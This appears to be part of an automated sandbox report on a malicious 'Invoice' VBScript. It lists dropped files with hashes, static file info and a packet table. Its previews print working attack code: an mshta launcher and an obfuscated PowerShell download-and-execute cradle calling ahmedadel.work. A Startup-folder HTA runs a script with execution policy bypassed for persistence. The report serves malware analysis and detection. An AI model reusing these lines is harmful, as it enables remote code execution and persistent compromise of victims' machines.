                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                            MD5:CC144808DBAF00E03294347EADC8E779
                                                            SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                            SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                            SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Encoding[1].txt
                                                            Process:C:\Windows\System32\mshta.exe
                                                            File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):583
                                                            Entropy (8bit):5.228576960295449
                                                            Encrypted:false
                                                            SSDEEP:12:6O70dK2OB1YRGgc/XHLC/GObqrj+09G5K/X227DKxgYRIYJYb:Z0dKz8GgcfrCXuGp5K/9+Xejb
                                                            MD5:FF381AA7F929176FCEDA5D54472A0670
                                                            SHA1:5B491D0D86375282D9453D876D441231630CBE57
                                                            SHA-256:2580ECB0C44544B0ED76A578BE09859DE445924887ABC093A335E3FB791F51FB
                                                            SHA-512:520C17930DDFE9D94B1C571799C79FF04D043D82B1FF0412AF472FCD50361448064010C66F3081B494BB723B1F05565409E0E7EFC0C6B9B05E7C4B59C43294A4
                                                            Malicious:false
                                                            IE Cache URL:http://ahmedadel.work/cairo/Encoding.txt
                                                            Preview: <script language=javascript>document.write(unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20var_func%28%29%0ADim%20ESRDTYGUHGYTFRHTCJVY%0Aset%20ESRDTYGUHGYTFRHTCJVY%20%3D%20CreateObject%28%22Wscript.Shell%22%29%0AESRDTYGUHGYTFRHTCJVY.run%20%22powershell%20%24c1%3D%27%28New-Object%20Net.We%27%3B%20%24c4%3D%27bClient%29.Downlo%27%3B%20%24c3%3D%27adString%28%27%27http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Join%20%27%27%29%7CI%60E%60X%22%2C0%0AEnd%20Function%0Avar_func%0Aself.close%0A%3C/script%3E%0A'))</script>
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):9709
                                                            Entropy (8bit):4.934970090060573
                                                            Encrypted:false
                                                            SSDEEP:192:V9sm54R3YrKkup5xVsm5emlt9smop5/iMDOmEN3H+OHgF4xoeRH3YrKkhVsm5emM:B4hb8JiQ0HzAFF/ib4Pib464
                                                            MD5:4EFC98FEE03268480FE754BF2609133A
                                                            SHA1:5B2EF7E503FD89F07F0F85CFC6FD8CD9BE73B3A3
                                                            SHA-256:05C474DB7617417D6DAF433C0963867505061EFBE6D9387301B2A504D28D7267
                                                            SHA-512:52F6E111B6F48D878DCDF13F4F129329273F1B5894F4454F262011BB8786AD162430661459C5E91D667673C883B09456E2D49202C442795421710DC78A4DB182
                                                            Malicious:false
                                                            Preview: PSMODULECACHE.....y......I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................I...C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1........PSConsoleHostReadline........Get-PSReadlineOption........Set-PSReadlineKeyHandler........Get-PSReadlineKeyHandler........Set-PSReadlineOption........Remove-PSReadlineKeyHandler................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource.....
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0i5401lf.ebk.psm1
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nu2p5pt.m4c.ps1
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsrdhrwr.o0u.ps1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwdo3uek.lly.psm1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0o4iy3h.v4q.ps1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zu0d2wkc.s5o.psm1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1141
                                                            Entropy (8bit):3.6863669326931423
                                                            Encrypted:false
                                                            SSDEEP:24:Z0dIBv3iGabeCIt1lCzhDCQz+aKVQEp6u/hMv:ZasvSGcel6NijVQEUy6v
                                                            MD5:722C8E312C545FB3B5DD76DA488BCA65
                                                            SHA1:BADE3E1CBD72E9A7FC21B73FB9FF6BCDB7122AA4
                                                            SHA-256:D1362EF8AB9633B49D0DA13EBE0672C2BA2F23CE78584AEF6800D94FB92D0EBF
                                                            SHA-512:DBB17E53B56E310FACF3C537B08E81D6B4C99A5E7E463DE9196717EB554440EF190F4CB9EF6E321C06511B295B1DD8B035359F42C56B63F39B6FD0F59F77180F
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta, Author: Joe Security
                                                            Preview: <script language=javascript>document.write(unescape('%3C%48%54%4D%4C%3E%20%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%75%74%66%2D%38%22%3E%0A%3C%48%45%41%44%3E%20%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%56%42%53%63%72%69%70%74%22%3E%0A%57%69%6E%64%6F%77%2E%52%65%53%69%7A%65%54%6F%20%30%2C%20%30%0A%57%69%6E%64%6F%77%2E%6D%6F%76%65%54%6F%20%2D%32%30%30%30%2C%2D%32%30%30%30%0A%53%65%74%20%6F%62%6A%53%68%65%6C%6C%20%3D%20%43%72%65%61%74%65%4F%62%6A%65%63%74%28%22%57%73%63%72%69%70%74%2E%53%68%65%6C%6C%22%29%0A%6F%62%6A%53%68%65%6C%6C%2E%52%75%6E%20%22%70%6F%77%22%20%26%20%22%65%72%73%68%65%6C%6C%20%2D%77%69%6E%64%6F%20%31%20%2D%6E%6F%65%78%69%74%20%2D%65%78%65%63%20%62%79%70%61%73%73%20%2D%66%69%6C%65%20%22%22%43%3A%5C%55%73%65%72%73%5C%50%75%62%6C%69%63%5C%4D%69%63%72%6F%73%6F%66%74%2E%70%73%31%22%2C%30%0A%73%65%6C%66%2E%63%6C%6F%73%6
                                                            C:\Users\user\Documents\20210227\PowerShell_transcript.642294.nqkS_Vsp.20210227191803.txt
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):978
                                                            Entropy (8bit):5.55606306965382
                                                            Encrypted:false
                                                            SSDEEP:24:BxSAm7vBZYex2DOXUWvZj1/2WaHjeTKKjX4CIym1ZJX6Zj1/a:BZMvjYeoORNxaqDYB1ZCNa
                                                            MD5:EAB71FDC0CDB2716CD0F6BDD6D464B91
                                                            SHA1:6B33C77EC1D0D4ECD0845A485AD90368F33FC110
                                                            SHA-256:A9AA5ED892FE880B97D3C8EAE31F8D1BAAE4CA39C3790BEC10740409ADB1FCD2
                                                            SHA-512:7BACADEE96067E556ED2798783434EFE83012583FBD781A2EDB6C5F5030A0F597811EC8CB8E7860DAC5FCDF7BBEA9A0A6B6B15888DF44173EFDBF5AB2D558BC8
                                                            Malicious:false
                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210227191803..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X..Process ID: 1320..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210227191803..**********************..PS>$c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X..
                                                            C:\Users\user\Documents\20210227\PowerShell_transcript.642294.s3EPy3U8.20210227191828.txt
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2531
                                                            Entropy (8bit):5.413207795562998
                                                            Encrypted:false
                                                            SSDEEP:48:BZIvjYeoOaMZF0qDYB1ZhZJMvjYeoOaMZF0qDYB1Z/69pJ1vqAfG7eJ1vqAfG7d:BZwjDNfCqDo1ZhZJcjDNfCqDo1Z/GpTs
                                                            MD5:D1E3129207E510FF7FAD75D80B2F62B3
                                                            SHA1:D691D48096CB538F33928656D469F237F8CFAF09
                                                            SHA-256:C474E79A5AF3C5316E2314B63B31318C02DF31FD7C73EAF898BC84CD48497EDB
                                                            SHA-512:8269E84185E526D08428A548BB1B88F3406DAEF46A64A0F57D180F36EE5F1C094E5BF51764A293068C6B32082BD3BD387926C85EEA0651079859407B68908CC4
                                                            Malicious:false
                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210227191829..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1..Process ID: 2240..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20210227192259..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec b
                                                            C:\Users\user\Documents\20210227\PowerShell_transcript.642294.uVQaZH3a.20210227191828.txt
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2334
                                                            Entropy (8bit):5.364818373181353
                                                            Encrypted:false
                                                            SSDEEP:48:BZPvjYeoOaMZFSqDYB1ZhZOvjYeoOaMZFSqDYB1ZGufZ62pfxKZ62pfxT:BZHjDNfgqDo1ZhZijDNfgqDo1ZGuB6uC
                                                            MD5:908384C3BB1A4D5C6EDF9096233FFBA9
                                                            SHA1:FC4DF4AF5876498428F4576604376E5BDE36A67C
                                                            SHA-256:F7564680D1332A950F9021505A7F776AA52D8B99719664A68DA6E8C0B0BCE626
                                                            SHA-512:F8C8C5BBD1B85317F6203B5DB587534E6F6D8AA9DB7C8927534A6C3835CBC8F7D4C449E2046BD5680ECC4720B12149703C2787E96A8A8FF390BB5DA71ECE98AF
                                                            Malicious:false
                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210227191839..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1..Process ID: 5764..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20210227191841..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 642294 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windo 1 -noexit -exec b

                                                            Static File Info

                                                            General

                                                            File type:ASCII text, with CRLF line terminators
                                                            Entropy (8bit):5.326589626467839
                                                            TrID:
                                                              File name:Invoice-ID-(882451).vbs
                                                              File size:243
                                                              MD5:3e338fb0311a9808b97c27f9427ba6fe
                                                              SHA1:9b65363cecd8bec73dcce9501f04a62feeeab228
                                                              SHA256:a517730f91314aaaf2e7843327e8a1d7c09b8e542449152a2725f2d4361b8bb3
                                                              SHA512:67cf4e6348847276c68220cf8f12aeb10cd6c674f5b1034ca3e08876b24892081b28f4f7cf3cc59ded4672a81bede9621f74bb74c28ded9e2d2be997733bf7ce
                                                              SSDEEP:6:YuAuPRizzNkRkizGY7ELHxNKFYvAbxrUU4oKkfXDLyM:YuvR8617ELyYvANruoKk7Lf
                                                              File Content Preview:AAAAAAAAAA = StrReverse("sm\23metsyS\swodniW\")..hhhbbaannkeerrss = "C:"+AAAAAAAAAA+"hta http://ahmedadel.work/cairo/Encoding.txt" ..set hhppll = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")..Execute("hhppll.Run hhhbbaannkeerrss , 0")

                                                              File Icon

                                                              Icon Hash:e8d69ece869a9ec4

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                              Feb 27, 2021 19:18:21.957562923 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957601070 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957623959 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957638979 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957678080 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957707882 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:21.957715034 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:21.957782984 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.008902073 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.008944035 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.009082079 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.031836987 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.031905890 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.031951904 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.031992912 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032032967 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032063007 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032075882 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032094955 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032116890 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032155991 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032192945 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032195091 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032248020 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032265902 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032305956 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032310009 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032366991 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032423973 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032444954 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032476902 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032515049 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032553911 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032592058 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032619953 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032638073 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032680988 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032715082 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032718897 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032727003 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032758951 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032794952 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032797098 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032835007 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032872915 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032911062 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032912016 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.032962084 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.032968044 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033020020 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033046961 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033065081 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033104897 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033143044 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033179998 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033214092 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033217907 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033257961 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033302069 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033305883 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033313036 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033349037 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033415079 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033426046 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033468962 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033504009 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033507109 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033546925 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033584118 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033607006 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033622026 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033662081 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033678055 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033710957 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033736944 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033754110 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033792973 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033832073 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.033857107 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.033935070 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.082794905 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.082850933 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.083015919 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107465982 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107511997 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107552052 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107590914 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107629061 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107669115 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107692003 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107718945 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107718945 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107745886 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107768059 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107805967 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107845068 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107853889 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107886076 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107912064 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.107925892 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.107965946 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108004093 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108005047 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108052969 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108092070 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108094931 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108134031 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108170986 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108172894 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108211994 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108248949 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108247995 CET4972180192.168.2.4212.64.222.172
